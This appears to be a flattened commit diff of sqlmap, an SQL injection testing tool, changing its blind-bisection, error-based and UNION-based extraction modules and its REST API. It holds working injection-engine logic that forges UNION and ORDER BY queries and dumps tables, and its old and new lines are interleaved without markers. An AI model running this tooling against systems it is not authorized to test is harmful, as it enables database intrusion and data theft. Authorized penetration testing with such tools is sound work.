warnMsg += "usage of option '--threads' for faster data retrieval"
singleTimeWarnMessage(warnMsg)
if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"):
if conf.verbose in (1, 2) and not showEta and not conf.api:
if isinstance(length, int) and conf.threads > 1:
dataToStdout("[%s] [INFO] retrieved: %s" % (time.strftime("%X"), "_" * min(length, conf.progressWidth)))
dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X"))
@@ -187,8 +187,9 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
else:
posValue = ord(hintValue[idx - 1])
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue))
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
forgedPayload = agent.extractPayload(payload)
forgedPayload = safeStringFormat(forgedPayload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue))
result = Request.queryPage(agent.replacePayload(payload, forgedPayload), timeBasedCompare=timeBasedCompare, raise404=False)
incrementCounter(kb.technique)
if result:
@@ -492,7 +493,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
if (endCharIndex - startCharIndex == conf.progressWidth) and (endCharIndex < length - 1):
output = output[:-2] + '..'
if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"):
if conf.verbose in (1, 2) and not showEta and not conf.api:
_ = count - firstChar
output += '_' * (min(length, conf.progressWidth) - len(output))
status = ' %d/%d (%d%%)' % (_, length, round(100.0 * _ / length))
@@ -522,7 +523,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
finalValue = "".join(value)
infoMsg = "\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(finalValue))
if conf.verbose in (1, 2) and not showEta and infoMsg and not hasattr(conf, "api"):
if conf.verbose in (1, 2) and not showEta and infoMsg and not conf.api:
dataToStdout(infoMsg)
# No multi-threading (--threads = 1)
@@ -558,7 +559,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
if result:
if showEta:
progress.progress(time.time() - charStart, len(commonValue))
elif conf.verbose in (1, 2) or hasattr(conf, "api"):
elif conf.verbose in (1, 2) or conf.api:
dataToStdout(filterControlChars(commonValue[index - 1:]))
finalValue = commonValue
@@ -608,7 +609,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
if showEta:
progress.progress(time.time() - charStart, index)
elif conf.verbose in (1, 2) or hasattr(conf, "api"):
elif conf.verbose in (1, 2) or conf.api:
dataToStdout(filterControlChars(val))
# some DBMSes (e.g. Firebird, DB2, etc.) have issues with trailing spaces
@@ -635,11 +636,11 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
elif partialValue:
hashDBWrite(expression, "%s%s" % (PARTIAL_VALUE_MARKER if not conf.hexConvert else PARTIAL_HEX_VALUE_MARKER, partialValue))
if conf.hexConvert and not abortedFlag and not hasattr(conf, "api"):
if conf.hexConvert and not abortedFlag and not conf.api:
infoMsg = "\r[%s] [INFO] retrieved: %s %s\n" % (time.strftime("%X"), filterControlChars(finalValue), " " * retrievedLength)
dataToStdout(infoMsg)
else:
if conf.verbose in (1, 2) and not showEta and not hasattr(conf, "api"):
if conf.verbose in (1, 2) and not showEta and not conf.api:
dataToStdout("\n")
if (conf.verbose in (1, 2) and showEta) or conf.verbose >= 3:

8
lib/techniques/brute/__init__.py
View File

@@ -1,8 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
pass

179
lib/techniques/error/use.py
View File

@@ -28,6 +28,7 @@ from lib.core.common import isNumPosStrValue
from lib.core.common import listToStrValue
from lib.core.common import readInput
from lib.core.common import unArrayizeValue
from lib.core.common import wasLastResponseHTTPError
from lib.core.convert import hexdecode
from lib.core.convert import htmlunescape
from lib.core.data import conf
@@ -97,8 +98,8 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
if retVal is None or partialValue:
try:
while True:
check = r"%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
trimcheck = r"%s(?P<result>[^<\n]*)" % (kb.chars.start)
check = r"(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
trimcheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start
if field:
nulledCastedField = agent.nullAndCastField(field)
@@ -120,7 +121,7 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
payload = agent.payload(newValue=injExpression)
# Perform the request
page, headers = Request.queryPage(payload, content=True, raise404=False)
page, headers, _ = Request.queryPage(payload, content=True, raise404=False)
incrementCounter(kb.technique)
@@ -130,23 +131,19 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
# Parse the returned page to get the exact error-based
# SQL injection output
output = reduce(lambda x, y: x if x is not None else y, (\
extractRegexResult(check, page, re.DOTALL | re.IGNORECASE), \
extractRegexResult(check, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] \
if headers else None), re.DOTALL | re.IGNORECASE), \
extractRegexResult(check, threadData.lastRedirectMsg[1] \
if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \
threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)), \
extractRegexResult(check, page), \
extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), \
extractRegexResult(check, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] if headers else None)), \
extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)), \
None)
if output is not None:
output = getUnicode(output)
else:
trimmed = extractRegexResult(trimcheck, page, re.DOTALL | re.IGNORECASE) \
or extractRegexResult(trimcheck, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] \
if headers else None), re.DOTALL | re.IGNORECASE) \
or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] \
if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \
threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
trimmed = extractRegexResult(trimcheck, page) \
or extractRegexResult(trimcheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None) \
or extractRegexResult(trimcheck, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] if headers else None)) \
or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
if trimmed:
if not chunkTest:
@@ -176,7 +173,7 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
else:
break
if output:
if output and conf.verbose in (1, 2) and not conf.api:
if kb.fileReadMode:
dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t"))
elif offset > 1:
@@ -205,8 +202,8 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
hashDBWrite(expression, retVal)
else:
_ = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
retVal = extractRegexResult(_, retVal, re.DOTALL | re.IGNORECASE) or retVal
_ = "(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
retVal = extractRegexResult(_, retVal) or retVal
return safecharencode(retVal) if kb.safeCharEncode else retVal
@@ -301,7 +298,7 @@ def errorUse(expression, dump=False):
_, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression)
# Set kb.partRun in case the engine is called from the API
kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None
kb.partRun = getPartRun(alias=False) if conf.api else None
# We have to check if the SQL query might return multiple entries
# and in such case forge the SQL limiting the query output one
@@ -355,94 +352,94 @@ def errorUse(expression, dump=False):
value = [] # for empty tables
return value
if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD:
message = "due to huge table size do you want to remove "
message += "ORDER BY clause gaining speed over consistency? [y/N] "
_ = readInput(message, default="N")
if isNumPosStrValue(count) and int(count) > 1:
if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD:
message = "due to huge table size do you want to remove "
message += "ORDER BY clause gaining speed over consistency? [y/N] "
if _ and _[0] in ("y", "Y"):
expression = expression[:expression.index(" ORDER BY ")]
if readInput(message, default="N", boolean=True):
expression = expression[:expression.index(" ORDER BY ")]
numThreads = min(conf.threads, (stopLimit - startLimit))
numThreads = min(conf.threads, (stopLimit - startLimit))
threadData = getCurrentThreadData()
threadData = getCurrentThreadData()
try:
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
except OverflowError:
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
errMsg += "with switch '--fresh-queries'"
raise SqlmapDataException(errMsg)
try:
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
except OverflowError:
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
errMsg += "with switch '--fresh-queries'"
raise SqlmapDataException(errMsg)
threadData.shared.value = BigArray()
threadData.shared.buffered = []
threadData.shared.counter = 0
threadData.shared.lastFlushed = startLimit - 1
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
threadData.shared.value = BigArray()
threadData.shared.buffered = []
threadData.shared.counter = 0
threadData.shared.lastFlushed = startLimit - 1
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
if threadData.shared.showEta:
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
if threadData.shared.showEta:
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD):
for field in expressionFieldsList:
if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0':
emptyFields.append(field)
debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable)
debugMsg += "dumped as it appears to be empty"
logger.debug(debugMsg)
if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD):
for field in expressionFieldsList:
if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0':
emptyFields.append(field)
debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable)
debugMsg += "dumped as it appears to be empty"
logger.debug(debugMsg)
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
kb.suppressResumeInfo = True
debugMsg = "suppressing possible resume console info because of "
debugMsg += "large number of rows. It might take too long"
logger.debug(debugMsg)
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
kb.suppressResumeInfo = True
debugMsg = "suppressing possible resume console info because of "
debugMsg += "large number of rows. It might take too long"
logger.debug(debugMsg)
try:
def errorThread():
threadData = getCurrentThreadData()
try:
def errorThread():
threadData = getCurrentThreadData()
while kb.threadContinue:
with kb.locks.limit:
try:
valueStart = time.time()
threadData.shared.counter += 1
num = threadData.shared.limits.next()
except StopIteration:
while kb.threadContinue:
with kb.locks.limit:
try:
valueStart = time.time()
threadData.shared.counter += 1
num = threadData.shared.limits.next()
except StopIteration:
break
output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta)
if not kb.threadContinue:
break
output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta)
if output and isListLike(output) and len(output) == 1:
output = output[0]
if not kb.threadContinue:
break
with kb.locks.value:
index = None
if threadData.shared.showEta:
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
for index in xrange(1 + len(threadData.shared.buffered)):
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
break
threadData.shared.buffered.insert(index or 0, (num, output))
while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]:
threadData.shared.lastFlushed += 1
threadData.shared.value.append(threadData.shared.buffered[0][1])
del threadData.shared.buffered[0]
if output and isListLike(output) and len(output) == 1:
output = output[0]
runThreads(numThreads, errorThread)
with kb.locks.value:
index = None
if threadData.shared.showEta:
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
for index in xrange(len(threadData.shared.buffered)):
if threadData.shared.buffered[index][0] >= num:
break
threadData.shared.buffered.insert(index or 0, (num, output))
while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]:
threadData.shared.lastFlushed += 1
threadData.shared.value.append(threadData.shared.buffered[0][1])
del threadData.shared.buffered[0]
except KeyboardInterrupt:
abortedFlag = True
warnMsg = "user aborted during enumeration. sqlmap "
warnMsg += "will display partial output"
logger.warn(warnMsg)
runThreads(numThreads, errorThread)
except KeyboardInterrupt:
abortedFlag = True
warnMsg = "user aborted during enumeration. sqlmap "
warnMsg += "will display partial output"
logger.warn(warnMsg)
finally:
threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered))
value = threadData.shared.value
kb.suppressResumeInfo = False
finally:
threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered))
value = threadData.shared.value
kb.suppressResumeInfo = False
if not value and not abortedFlag:
value = _errorFields(expression, expressionFields, expressionFieldsList)

18
lib/techniques/union/test.py
View File

@@ -53,8 +53,8 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix)
query = agent.suffixQuery(query, suffix=suffix, comment=comment)
payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where)
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers) or re.search(r"data types cannot be compared or sorted", page or "", re.I)
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I)
if _orderByTest(1) and not _orderByTest(randomInt()):
infoMsg = "'ORDER BY' technique appears to be usable. "
@@ -105,10 +105,10 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
for count in xrange(lowerCount, upperCount + 1):
query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
if not isNullValue(kb.uChar):
pages[count] = page
ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO
ratio = comparison(page, headers, code, getRatioValue=True) or MIN_RATIO
ratios.append(ratio)
min_, max_ = min(min_, ratio), max(max_, ratio)
items.append((count, ratio))
@@ -187,7 +187,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
@@ -209,7 +209,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")
if not all(_ in content for _ in (phrase, phrase2)):
@@ -222,7 +222,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
@@ -283,8 +283,8 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
if not conf.uChar and count > 1 and kb.uChar == NULL:
message = "injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] "
test = readInput(message, default="Y")
if test[0] not in ("y", "Y"):
if not readInput(message, default="Y", boolean=True):
warnMsg += "usage of option '--union-char' "
warnMsg += "(e.g. '--union-char=1') "
else:

209
lib/techniques/union/use.py
View File

@@ -81,7 +81,7 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
payload = agent.payload(newValue=query, where=where)
# Perform the request
page, headers = Request.queryPage(payload, content=True, raise404=False)
page, headers, _ = Request.queryPage(payload, content=True, raise404=False)
incrementCounter(PAYLOAD.TECHNIQUE.UNION)
@@ -215,7 +215,7 @@ def unionUse(expression, unpack=True, dump=False):
_, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr)
# Set kb.partRun in case the engine is called from the API
kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None
kb.partRun = getPartRun(alias=False) if conf.api else None
if Backend.isDbms(DBMS.MSSQL) and kb.dumpColumns:
kb.rowXmlMode = True
@@ -226,7 +226,7 @@ def unionUse(expression, unpack=True, dump=False):
if expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper():
# Removed ORDER BY clause because UNION does not play well with it
expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I)
expression = re.sub("(?i)\s*ORDER BY\s+[\w,]+", "", expression)
debugMsg = "stripping ORDER BY clause from statement because "
debugMsg += "it does not play well with UNION query SQL injection"
singleTimeDebugMessage(debugMsg)
@@ -284,126 +284,127 @@ def unionUse(expression, unpack=True, dump=False):
value = [] # for empty tables
return value
threadData = getCurrentThreadData()
if isNumPosStrValue(count) and int(count) > 1:
threadData = getCurrentThreadData()
try:
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
except OverflowError:
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
errMsg += "with switch '--fresh-queries'"
raise SqlmapDataException(errMsg)
try:
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
except OverflowError:
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
errMsg += "with switch '--fresh-queries'"
raise SqlmapDataException(errMsg)
numThreads = min(conf.threads, (stopLimit - startLimit))
threadData.shared.value = BigArray()
threadData.shared.buffered = []
threadData.shared.counter = 0
threadData.shared.lastFlushed = startLimit - 1
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
numThreads = min(conf.threads, (stopLimit - startLimit))
threadData.shared.value = BigArray()
threadData.shared.buffered = []
threadData.shared.counter = 0
threadData.shared.lastFlushed = startLimit - 1
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
if threadData.shared.showEta:
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
if threadData.shared.showEta:
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
kb.suppressResumeInfo = True
debugMsg = "suppressing possible resume console info because of "
debugMsg += "large number of rows. It might take too long"
logger.debug(debugMsg)
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
kb.suppressResumeInfo = True
debugMsg = "suppressing possible resume console info because of "
debugMsg += "large number of rows. It might take too long"
logger.debug(debugMsg)
try:
def unionThread():
threadData = getCurrentThreadData()
try:
def unionThread():
threadData = getCurrentThreadData()
while kb.threadContinue:
with kb.locks.limit:
try:
valueStart = time.time()
threadData.shared.counter += 1
num = threadData.shared.limits.next()
except StopIteration:
while kb.threadContinue:
with kb.locks.limit:
try:
valueStart = time.time()
threadData.shared.counter += 1
num = threadData.shared.limits.next()
except StopIteration:
break
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
field = expressionFieldsList[0]
elif Backend.isDbms(DBMS.ORACLE):
field = expressionFieldsList
else:
field = None
limitedExpr = agent.limitQuery(num, expression, field)
output = _oneShotUnionUse(limitedExpr, unpack, True)
if not kb.threadContinue:
break
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
field = expressionFieldsList[0]
elif Backend.isDbms(DBMS.ORACLE):
field = expressionFieldsList
else:
field = None
if output:
with kb.locks.value:
if all(_ in output for _ in (kb.chars.start, kb.chars.stop)):
items = parseUnionPage(output)
limitedExpr = agent.limitQuery(num, expression, field)
output = _oneShotUnionUse(limitedExpr, unpack, True)
if threadData.shared.showEta:
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
if isListLike(items):
# in case that we requested N columns and we get M!=N then we have to filter a bit
if len(items) > 1 and len(expressionFieldsList) > 1:
items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)]
items = [_ for _ in flattenValue(items)]
if len(items) > len(expressionFieldsList):
filtered = OrderedDict()
for item in items:
key = re.sub(r"[^A-Za-z0-9]", "", item).lower()
if key not in filtered or re.search(r"[^A-Za-z0-9]", item):
filtered[key] = item
items = filtered.values()
items = [items]
index = None
for index in xrange(1 + len(threadData.shared.buffered)):
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
break
threadData.shared.buffered.insert(index or 0, (num, items))
else:
index = None
if threadData.shared.showEta:
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
for index in xrange(1 + len(threadData.shared.buffered)):
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
break
threadData.shared.buffered.insert(index or 0, (num, None))
if not kb.threadContinue:
break
items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter)
if output:
with kb.locks.value:
if all(_ in output for _ in (kb.chars.start, kb.chars.stop)):
items = parseUnionPage(output)
while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH):
threadData.shared.lastFlushed, _ = threadData.shared.buffered[0]
if not isNoneValue(_):
threadData.shared.value.extend(arrayizeValue(_))
del threadData.shared.buffered[0]
if threadData.shared.showEta:
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
if isListLike(items):
# in case that we requested N columns and we get M!=N then we have to filter a bit
if len(items) > 1 and len(expressionFieldsList) > 1:
items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)]
items = [_ for _ in flattenValue(items)]
if len(items) > len(expressionFieldsList):
filtered = OrderedDict()
for item in items:
key = re.sub(r"[^A-Za-z0-9]", "", item).lower()
if key not in filtered or re.search(r"[^A-Za-z0-9]", item):
filtered[key] = item
items = filtered.values()
items = [items]
index = None
for index in xrange(len(threadData.shared.buffered)):
if threadData.shared.buffered[index][0] >= num:
break
threadData.shared.buffered.insert(index or 0, (num, items))
else:
index = None
if threadData.shared.showEta:
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
for index in xrange(len(threadData.shared.buffered)):
if threadData.shared.buffered[index][0] >= num:
break
threadData.shared.buffered.insert(index or 0, (num, None))
if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta:
_ = ','.join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items
status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_))
items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter)
if len(status) > width:
status = "%s..." % status[:width - 3]
while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH):
threadData.shared.lastFlushed, _ = threadData.shared.buffered[0]
if not isNoneValue(_):
threadData.shared.value.extend(arrayizeValue(_))
del threadData.shared.buffered[0]
dataToStdout("%s\n" % status)
if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta:
_ = ",".join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items
status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_))
runThreads(numThreads, unionThread)
if len(status) > width:
status = "%s..." % status[:width - 3]
if conf.verbose == 1:
clearConsoleLine(True)
dataToStdout("%s\n" % status)
except KeyboardInterrupt:
abortedFlag = True
runThreads(numThreads, unionThread)
warnMsg = "user aborted during enumeration. sqlmap "
warnMsg += "will display partial output"
logger.warn(warnMsg)
if conf.verbose == 1:
clearConsoleLine(True)
except KeyboardInterrupt:
abortedFlag = True
warnMsg = "user aborted during enumeration. sqlmap "
warnMsg += "will display partial output"
logger.warn(warnMsg)
finally:
for _ in sorted(threadData.shared.buffered):
if not isNoneValue(_[1]):
threadData.shared.value.extend(arrayizeValue(_[1]))
value = threadData.shared.value
kb.suppressResumeInfo = False
finally:
for _ in sorted(threadData.shared.buffered):
if not isNoneValue(_[1]):
threadData.shared.value.extend(arrayizeValue(_[1]))
value = threadData.shared.value
kb.suppressResumeInfo = False
if not value and not abortedFlag:
output = _oneShotUnionUse(expression, unpack)

170
lib/utils/api.py
View File

@@ -7,6 +7,7 @@ See the file 'doc/COPYING' for copying permission
"""
import contextlib
import httplib
import logging
import os
import re
@@ -20,8 +21,8 @@ import urllib2
from lib.core.common import dataToStdout
from lib.core.common import getSafeExString
from lib.core.common import saveConfig
from lib.core.common import unArrayizeValue
from lib.core.convert import base64pickle
from lib.core.convert import hexencode
from lib.core.convert import dejsonize
from lib.core.convert import jsonize
@@ -43,6 +44,7 @@ from lib.core.settings import RESTAPI_DEFAULT_ADDRESS
from lib.core.settings import RESTAPI_DEFAULT_PORT
from lib.core.subprocessng import Popen
from lib.parse.cmdline import cmdLineParser
from thirdparty.bottle.bottle import abort
from thirdparty.bottle.bottle import error as return_error
from thirdparty.bottle.bottle import get
from thirdparty.bottle.bottle import hook
@@ -50,14 +52,15 @@ from thirdparty.bottle.bottle import post
from thirdparty.bottle.bottle import request
from thirdparty.bottle.bottle import response
from thirdparty.bottle.bottle import run
from thirdparty.bottle.bottle import server_names
# global settings
# Global data storage
class DataStore(object):
admin_id = ""
current_db = None
tasks = dict()
username = None
password = None
# API objects
class Database(object):
@@ -69,7 +72,7 @@ class Database(object):
self.cursor = None
def connect(self, who="server"):
self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None)
self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None, check_same_thread=False)
self.cursor = self.connection.cursor()
logger.debug("REST-JSON API %s connected to IPC database" % who)
@@ -117,7 +120,6 @@ class Database(object):
"taskid INTEGER, error TEXT"
")")
class Task(object):
def __init__(self, taskid, remote_addr):
self.remote_addr = remote_addr
@@ -162,12 +164,16 @@ class Task(object):
self.options = AttribDict(self._original_options)
def engine_start(self):
handle, configFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CONFIG, text=True)
os.close(handle)
saveConfig(self.options, configFile)
if os.path.exists("sqlmap.py"):
self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)], shell=False, close_fds=not IS_WIN)
self.process = Popen(["python", "sqlmap.py", "--api", "-c", configFile], shell=False, close_fds=not IS_WIN)
elif os.path.exists(os.path.join(os.getcwd(), "sqlmap.py")):
self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)], shell=False, cwd=os.getcwd(), close_fds=not IS_WIN)
self.process = Popen(["python", "sqlmap.py", "--api", "-c", configFile], shell=False, cwd=os.getcwd(), close_fds=not IS_WIN)
else:
self.process = Popen(["sqlmap", "--pickled-options", base64pickle(self.options)], shell=False, close_fds=not IS_WIN)
self.process = Popen(["sqlmap", "--api", "-c", configFile], shell=False, close_fds=not IS_WIN)
def engine_stop(self):
if self.process:
@@ -227,34 +233,26 @@ class StdDbOut(object):
# Ignore all non-relevant messages
return
output = conf.databaseCursor.execute(
"SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?",
(self.taskid, content_type))
output = conf.databaseCursor.execute("SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?", (self.taskid, content_type))
# Delete partial output from IPC database if we have got a complete output
if status == CONTENT_STATUS.COMPLETE:
if len(output) > 0:
for index in xrange(len(output)):
conf.databaseCursor.execute("DELETE FROM data WHERE id = ?",
(output[index][0],))
conf.databaseCursor.execute("DELETE FROM data WHERE id = ?", (output[index][0],))
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
(self.taskid, status, content_type, jsonize(value)))
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value)))
if kb.partRun:
kb.partRun = None
elif status == CONTENT_STATUS.IN_PROGRESS:
if len(output) == 0:
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
(self.taskid, status, content_type,
jsonize(value)))
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value)))
else:
new_value = "%s%s" % (dejsonize(output[0][2]), value)
conf.databaseCursor.execute("UPDATE data SET value = ? WHERE id = ?",
(jsonize(new_value), output[0][0]))
conf.databaseCursor.execute("UPDATE data SET value = ? WHERE id = ?", (jsonize(new_value), output[0][0]))
else:
